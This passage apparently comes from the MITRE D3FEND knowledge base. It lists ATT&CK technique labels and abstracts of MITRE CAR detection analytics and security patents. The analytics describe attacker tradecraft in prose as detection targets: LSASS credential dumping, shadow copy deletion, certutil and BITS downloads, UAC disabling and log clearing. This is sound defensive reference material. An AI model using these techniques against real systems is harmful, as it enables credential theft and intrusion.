  • "Process Discovery"

may-invoke

Usage (5)

attack-id

  • "T1082"

rdfs:label

  • "System Information Discovery"

may-access

may-invoke

Usage (5)

attack-id

  • "T1083"

rdfs:label

  • "File and Directory Discovery"

accesses

Usage (5)

attack-id

  • "T1124"

rdfs:label

  • "System Time Discovery"

may-invoke

Usage (5)

attack-id

  • "T1142"

rdfs:label

  • "Keychain"

accesses

Usage (5)

definition

  • "Analyzing the reputation of a URL."

rdfs:label

  • "URL Reputation Analysis"

analyzes

d3fend-id

  • "D3-URA"

kb-reference

Usage (5)

Usage (5)

kb-abstract

  • "Approaches for executing untrusted software on a client without compromising the client using micro-virtualization to execute untrusted software in isolated contexts. A template for instantiating a virtual machine on a client is identified in response to receiving a request to execute an application. After the template is identified, without human intervention, a virtual machine is instantiated, using the template, in which the application is to be executed. The template may be selected from a plurality of templates based on the nature of the request, as each template describe characteristics of a virtual machine suitable for a different type of activity. Selected resources such as files are displayed to the virtual machines according to user and organization policies and controls. When the client determines that the application has ceased to execute, the client ceases execution of the virtual machine without human intervention."

kb-author

  • "Gaurav Banga, Ian Pratt, Kiran Bondalapati, Vikram Kapoor"

kb-mitre-analysis

  • ""

kb-organization

  • "Bromium, Inc."

rdfs:label

  • "Reference - Approaches for securing an internet endpoint using fine-grained operating system virtualization - Bromium, Inc."

kb-reference-of

kb-reference-title

  • "Approaches for securing an internet endpoint using fine-grained operating system virtualization"

Usage (5)

kb-abstract

  • "Microsoft Windows uses its implementation of Distributed Computing Environment/Remote Procedure Call (DCE/RPC), which it calls Microsoft RPC, to call certain APIs remotely.

    A Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.

    RPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of Lateral Movement."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-05-001: RPC Activity - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-05-001: RPC Activity"

Usage (5)

kb-abstract

  • "When AT.exe is used to remotely schedule tasks, Windows uses named pipes over SMB to communicate with the API on the remote machine. After authentication over SMB, the Named Pipe “ATSVC” is opened, over which the JobAdd function is called. On the remote host, the job files are created by the Task Scheduler and follow the convention C:\Windows\System32\AT<job\_id>. Unlike CAR-2013-05-004, this analytic specifically focuses on uses of AT that can be detected between hosts, indicating remotely gained execution.

    This pipe activity could be discovered with a network decoder, such as that in wireshark, that can inspect SMB traffic to identify the use of pipes. It could also be detected by looking for raw packet capture streams or from a custom sensor on the host that hooks the appropriate API functions. If no network or API level of visibility is possible, this traffic may inferred by looking at SMB connections over 445/tcp followed by the creation of files matching the pattern C:\Windows\System32\AT\<job_id\>."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2015-04-001: Remotely Scheduled Tasks via AT - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2015-04-001: Remotely Scheduled Tasks via AT"

Usage (5)

kb-abstract

  • "The Windows Volume Shadow Copy Service is a built-in OS feature that can be used to create backup copies of files and volumes.

    Adversaries may delete these shadow copies, typically through the usage of system utilities such as vssadmin.exe or wmic.exe, in order prevent file and data recovery. This technique is commonly employed for this purpose by ransomware."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-04-001: Shadow Copy Deletion - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-04-001: Shadow Copy Deletion"

Usage (5)

kb-abstract

  • "This analytic detects the minidump variant of credential dumping where a process opens lsass.exe in order to extract credentials using the Win32 API call MiniDumpWriteDump. Tools like SafetyKatz, SafetyDump, and Outflank-Dumpert default to this variant and may be detected by this analytic, though keep in mind that not all options for using those tools will result in this specific behavior.

    The analytic is based on a Sigma analytic contributed by Samir Bousseaden and written up in a blog on MENASEC. It looks for a call trace that includes either dbghelp.dll or dbgcore.dll, which export the relevant functions/permissions to perform the dump. It also detects using the Windows Task Manager (taskmgr.exe) to dump lsass, which is described in CAR-2019-08-001. In this iteration of the Sigma analytic, the GrantedAccess filter isn’t included because it didn’t seem to filter out any false positives and introduces the potential for evasion.

    This analytic was tested both in a lab and in a production environment with a very low false-positive rate. werfault.exe and tasklist.exe, both standard Windows processes, showed up multiple times as false positives."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-05-001: MiniDump of LSASS - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-05-001: MiniDump of LSASS"

Usage (5)

kb-abstract

  • "LoLBAS are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they’re used (this would depend on your environment), but many others are very common and can’t be simply alerted on.

    This analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.

    The analytic needs to be tuned. The 1.5 in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-05-003: Rare LolBAS Command Lines - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-05-003: Rare LolBAS Command Lines"

Usage (5)

kb-abstract

  • "NTFS Alternate Data Streams (ADSs) may be used by adversaries as a means of evading security tools by storing malicious data or binaries in file attribute metadata. ADSs are also powerful because they can be directly executed by various Windows tools; accordingly, this analytic looks at common ways of executing ADSs using system utilities such as powershell."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-08-001: NTFS Alternate Data Stream Execution - System Utilities"

Usage (5)

kb-abstract

  • "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-001: Scheduled Task - FileAccess - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-001: Scheduled Task - FileAccess"

Usage (5)

kb-abstract

  • "Adversaries may establish persistence or escalate privileges by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. This is typically done by replacing COM object registry entries under the HKEY_CURRENT_USER\Software\Classes\CLSID or HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID keys. Accordingly, this analytic looks for any changes under these keys."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-002: Component Object Model Hijacking - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-002: Component Object Model Hijacking"

Usage (5)

kb-abstract

  • "Adversaries may attempt to evade system defenses by unloading minifilter drivers used by host-based sensors such as Sysmon through the use of the fltmc command-line utility. Accordingly, this analytic looks for command-line invocations of this utility when used to unload minifilter drivers."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-003: Indicator Blocking - Driver Unloaded - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-003: Indicator Blocking - Driver Unloaded"

Usage (5)

kb-abstract

  • "Adversaries may search the Windows Registry on compromised systems for insecurely stored credentials for credential access. This can be accomplished using the query functionality of the reg.exe system utility, by looking for keys and values that contain strings such as “password”. In addition, adversaries may use toolkits such as PowerSploit in order to dump credentials from various applications such as IIS.Accordingly, this analytic looks for invocations of reg.exe in this capacity as well as that of several powersploit modules with similar functionality."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-004: Credentials in Files & Registry - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-004: Credentials in Files & Registry"

Usage (5)

kb-abstract

  • "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. These values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes. Accordingly, this analytic looks for modifications to these registry keys that may be indicative of this type of abuse."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-09-005: AppInit DLLs - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-09-005: AppInit DLLs"

Usage (5)

kb-abstract

  • "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\EnvironmentUserInitMprLogonScript. This signature looks edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-001: Boot or Logon Initialization Scripts - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-001: Boot or Logon Initialization Scripts"

Usage (5)

kb-abstract

  • "Adversaries may use a variety of tools to gain visibility on the current status of things on the network: which processes are listening on which ports, which services are running on other hosts, etc. This analytic looks for the names of the most common network sniffing tools. While this may be noisy on networks where sysadmins are using any of these tools on a regular basis, in most networks their use is noteworthy."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-002: Local Network Sniffing - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-002: Local Network Sniffing"

Usage (5)

kb-abstract

  • "Injecting a malicious DLL into a process is a common adversary TTP. Although the ways of doing this are numerous, mavinject.exe is a commonly used tool for doing so because it roles up many of the necessary steps into one, and is available within Windows. Attackers may rename the executable, so we also use the common argument “INJECTRUNNING” as a related signature here. Whitelisting certain applications may be necessary to reduce noise for this analytic."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-003: DLL Injection with Mavinject - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-003: DLL Injection with Mavinject"

Usage (5)

kb-abstract

  • "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discepency. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-004: Processes Started From Irregular Parent - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-004: Processes Started From Irregular Parent"

Usage (5)

kb-abstract

  • "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the Powershell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only commandline-based commands are detected. Note that the command to remove the history file directly may very a bit if the history file is not saved in the default path on a particular system."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-005: Clear Powershell Console Command History - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-005: Clear Powershell Console Command History"

Usage (5)

kb-abstract

  • "Cyber actors frequently enumerate local or domain permissions groups. The net utility is usually used for this purpose. This analytic looks for any instances of net.exe, which is not normally used for benign purposes, although system administrator actions may trigger false positives."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-006: Local Permission Group Discovery - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-006: Local Permission Group Discovery"

Usage (5)

kb-abstract

  • "Adversaries may use network shares to exfliltrate date; they will then remove the shares to cover their tracks. This analytic looks for the removal of network shares via commandline, which is otherwise a rare event."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-007: Network Share Connection Removal - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-007: Network Share Connection Removal"

Usage (5)

kb-abstract

  • "Trusted developer utilities such as MSBuild may be leveraged to run malicious code with elevated privileges. This analytic looks for any instances of msbuild.exe, which will execute any C# code placed within a given XML document; and msxsl.exe, which processes xsl transformation specifications for XML files and will execute a variaty of scripting languages contained within the XSL file. Both of these executables are rarely used outside of Visual Studio."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-008: MSBuild and msxsl - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-008: MSBuild and msxsl"

Usage (5)

kb-abstract

  • "Adversaries may hide malicious code in .chm compiled HTML files. When these files are read, Windows uses the HTML help executable named hh.exe, which is the signature for this analytic."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-009: Compiled HTML Access - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-009: Compiled HTML Access"

Usage (5)

kb-abstract

  • "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to setup listeners that will receive and install malware from remote sources in trusted fashion. When CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2020-11-010: CMSTP - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2020-11-010: CMSTP"

Usage (5)

kb-abstract

  • "Often, after a threat actor gains access to a system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-002: Unusually Long Command Line Strings - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-002: Unusually Long Command Line Strings"

Usage (5)

kb-abstract

  • "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using “wevtutil”, a legitimate tool provided by Microsoft. This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network."

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-003: Clearing Windows Logs with Wevtutil - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-003: Clearing Windows Logs with Wevtutil"

Usage (5)

kb-abstract

  • "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-004: Unusual Child Process for Spoolsv.Exe or Connhost.Exe"

Usage (5)

kb-abstract

  • "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-006: Unusual Child Process spawned using DDE exploit - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-006: Unusual Child Process spawned using DDE exploit"

Usage (5)

kb-abstract

  • "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using “sc” [service control], a legitimate tool provided by Microsoft for managing services. This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network."

kb-author

  • "MITRE"

kb-mitre-analysis

  • "d"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-007: Detecting Tampering of Windows Defender Command Prompt"

Usage (5)

kb-abstract

  • "Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using “reg.exe”, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-008: Disable UAC - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-008: Disable UAC"

Usage (5)

kb-abstract

  • "After compromising a network of systems, threat actors often try to delete Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. This non-detection of this technique, which is often employed by ransomware strains such as “Olympic Destroyer”, may lead to a failure in recovering systems after an attack."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-01-009: Detecting Shadow Copy Deletion via Vssadmin.exe"

Usage (5)

kb-abstract

  • "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gatway in a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-02-001: Webshell-Indicative Process Tree - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-02-001: Webshell-Indicative Process Tree"

Usage (5)

kb-abstract

  • "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to “Get System”, which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connects an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-02-002: Get System Elevation - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-02-002: Get System Elevation"

Usage (5)

kb-abstract

  • "Masquerading (T1036) is defined by ATT&CK as follows:

    “Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.”

    Malware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. lsass.exe, svchost.exe, etc).

    There are several sub-techniques, but this analytic focuses on Match Legitimate Name or Location only."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-04-001: Common Windows Process Masquerading - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-04-001: Common Windows Process Masquerading"

Usage (5)

kb-abstract

  • "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. This action may be the precursor to malicious activity."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store"

Usage (5)

kb-abstract

  • "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\Windows\System32 directory tree. There will be only occasional false positives due to administrator actions."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-002: Batch File Write to System32 - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-002: Batch File Write to System32"

Usage (5)

kb-abstract

  • "This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-003: BCDEdit Failure Recovery Modification - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-003: BCDEdit Failure Recovery Modification"

Usage (5)

kb-abstract

  • "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use bitsadmin /list /verbose to list out the jobs during investigation."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-004: BITS Job Persistence - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-004: BITS Job Persistence"

Usage (5)

kb-abstract

  • "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe using the transfer parameter to download a remote object. In addition, look for download or upload on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from bitsadmin.exe, but the artifacts will appear in a parallel process of svchost.exe with a command-line similar to svchost.exe -k netsvcs -s BITS. It’s important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. You can use bitsadmin /list /verbose to list out the jobs during investigation."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-005: BITSAdmin Download File - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-005: BITSAdmin Download File"

Usage (5)

kb-abstract

  • "Certutil.exe may download a file from a remote destination using -urlcache. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. However, it is uncommon for certutil.exe to write files to world writeable paths.\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-006: CertUtil Download With URLCache and Split Arguments"

Usage (5)

kb-abstract

  • "Certutil.exe may download a file from a remote destination using -VerifyCtl. This behavior does require a URL to be passed on the command-line. In addition, -f (force) and -split (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for certutil.exe to contact public IP space. \ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. Using -VerifyCtl, the file will either be written to the current working directory or %APPDATA%\..\LocalLow\Microsoft\CryptnetUrlCache\Content\<hash>."

rdfs:label

  • "Reference - CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-007: CertUtil Download With VerifyCtl and Split Arguments"

Usage (5)

kb-abstract

  • "This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-008: Certutil exe certificate extraction - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-008: Certutil exe certificate extraction"

Usage (5)

kb-abstract

  • "CertUtil.exe may be used to encode and decode a file, including PE and script code. Encoding will convert a file to base64 with -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- tags. Malicious usage will include decoding a encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - encodehex and decodehex. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-009: CertUtil With Decode Argument - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-009: CertUtil With Decode Argument"

Usage (5)

kb-abstract

  • "This search looks for the creation of local administrator accounts using net.exe."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-010: Create local admin accounts using net exe - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-010: Create local admin accounts using net exe"

Usage (5)

kb-abstract

  • "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2021-05-011: Create Remote Thread into LSASS - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2021-05-011: Create Remote Thread into LSASS"

Usage (5)

kb-abstract

  • "An apparatus is equipped to automatically update one or more integrity references of a software entity, when the software entity is installed onto the apparatus. The apparatus is further equipped to periodically determine whether the integrity of the apparatus has been compromised based at least in part on the one or more integrity references of the software entity that are automatically updated during installation of the software entity."

kb-author

  • "Thomas Good, Robert DiFalco, Gene Kim"

kb-mitre-analysis

  • ""

kb-organization

  • "Tripwire, Inc."

rdfs:label

  • "Reference - Computing apparatus with automatic integrity reference generation and maintenance - Tripwire, Inc."

kb-reference-of

kb-reference-title

  • "Computing apparatus with automatic integrity reference generation and maintenance"

Usage (5)

kb-abstract

  • "A security system provides a defense from known and unknown viruses, worms, spyware, hackers, and unwanted software. The system can implement centralized policies that allow an administrator to approve, block, quarantine, and log file activities. The system can extract content of interest from a file container, repackage the content of interest as another valid file type, perform hashes on the content of interest, associate the hash of the container with the hash of the repackaged content, transfer the repackaged content, and store the hash with other security-related information."

kb-author

  • "Todd Brennan"

kb-mitre-analysis

  • ""

kb-organization

  • "Bit 9 Inc, Carbon Black Inc"

rdfs:label

  • "Reference - Content extractor and analysis system - Bit 9 Inc, Carbon Black Inc"

kb-reference-of

kb-reference-title

  • "Content extractor and analysis system"

Usage (5)

kb-abstract

  • "This paper describes a simple, software based keyboard monitoring system for the IBM PC for the continuous analysis of the typing characteristics of the user for the purpose of continuous authentication. By exploiting the electrical characteristics of the PC keyboard interface together with modifications to the internal system timer, very accurate measurements can be made of keystroke interval and duration, including measurements of rollover. Rollover patterns, particularly when typing common diphthongs, can be highly characteristic of individual users and provide quite an accurate indication of the users identity.
    Published in: European Convention on Security and Detection, 1995."

kb-author

  • "S.J. Shepherd"

kb-mitre-analysis

  • ""

kb-organization

  • "Bradford Univ., UK"

rdfs:label

  • "Reference - Continuous authentication by analysis of keyboard typing characteristics - Bradford Univ., UK"

kb-reference-of

kb-reference-title

  • "Continuous authentication by analysis of keyboard typing characteristics"

Usage (5)

kb-abstract

  • "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.

    In order to convince the potential attacker that the deception environment is the real (valid) processing environment and/or part thereof, the campaign manager may construct the false identity according to the public information of the certain user that may typically be available to the potential attacker. By exposing the real (public) information of the certain user to the potential attacker, the false identity may seem consistent and legitimate to the potential attacker. For example, the campaign manager may create a false account, for example, a Facebook account of the certain user that includes the same public information that is publicly available to other Facebook users from the real (genuine) Facebook account of the certain user. The fake company account may include information specific to the role and/or job title of certain user within the company, for example, a programmer, an accountant, an IT person and/or the like."

kb-author

  • "Dean Sysman, Gadi Evron, Imri Goldberg, Itamar Sher, Shmuel Ur"

kb-mitre-analysis

  • ""

kb-organization

  • "Cymmetria, Inc."

rdfs:label

  • "Reference - Decoy and deceptive data object technology - Cymmetria, Inc."

kb-reference-of

kb-reference-title

  • "Decoy and deceptive data object technology"

Usage (5)

kb-abstract

  • "Approaches for launching an application within a virtual machine. In response to receiving a request to launch an application, a device instantiates, without human intervention and based on a policy, a virtual machine in which the application is to be launched. The policy determines which resources of a device, such as a mobile device or computer system, are accessible to the virtual machine. The policy may, but need not, determine whether the virtual machine has access to a type of resource which obligates the user of the device to make a monetary payment for the user of the resource."

kb-author

  • "Gaurav Banga, Sergei Vorobiev, Deepak Khajuria, Vikram Kapoor, Ian Pratt, Simon Crosby, Adrian Taylor"

kb-mitre-analysis

  • ""

kb-organization

  • "Bromium, Inc."

rdfs:label

  • "Reference - Isolation of applications within a virtual machine - Bromium, Inc."

kb-reference-of

kb-reference-title

  • "Isolation of applications within a virtual machine"

Usage (5)

kb-abstract

